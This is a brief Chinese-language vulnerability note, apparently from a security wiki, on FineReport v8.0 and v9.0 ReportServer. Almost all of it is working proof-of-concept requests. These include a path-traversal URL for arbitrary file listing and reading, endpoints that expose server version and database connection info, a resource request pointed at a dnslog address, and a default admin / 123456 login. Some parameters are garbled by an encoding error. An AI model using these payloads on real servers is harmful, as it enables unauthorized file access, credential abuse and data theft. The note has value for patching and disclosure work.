影响
FineReport v8.0
FineReport v9.0
接口
/WebReport/ReportServer
POC
http://www.0-sec.org:8080/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..¤tUserName=admin¤tUserId=1&isWebReport=true
参考链接
https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/FineReport/FineReport%20任意文件读取漏洞/
POC
/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false
/ReportServer?op=fr_server&cmd=sc_version_info&showtoolbar=false
/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/ReportServer?op=resource&resource=dnslog地址
/ReportServer?op=fr_auth&cmd=ah_loginui&_=1619795319853
admin / 123456
http://www.hackdig.com/05/hack-341466.htm